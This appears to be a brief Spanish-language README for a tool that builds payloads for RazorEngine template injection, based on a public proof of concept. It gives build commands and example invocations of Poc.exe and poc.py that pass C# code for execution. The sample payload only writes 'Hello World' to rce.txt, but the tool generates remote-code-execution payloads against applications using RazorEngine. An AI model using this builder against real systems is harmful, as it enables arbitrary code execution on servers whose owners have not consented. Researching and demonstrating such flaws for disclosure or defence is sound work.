
Constructor simple de payloads
Constructor simple de payload basado en el POC en: https://github.com/Antaris/RazorEngine/issues/585
dotnet build --configuration Release
.\bin\Release\net4.8\Poc.exe "System.IO.File.WriteAllText(\"rce.txt\", \"Hello World\");"
./poc.py "System.IO.File.WriteAllText(\"rce.txt\", \"Hello World\");"